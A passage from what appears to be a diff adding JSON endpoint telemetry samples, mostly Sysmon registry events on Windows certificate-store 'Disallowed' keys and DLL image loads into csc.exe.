"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858550000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570858869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + 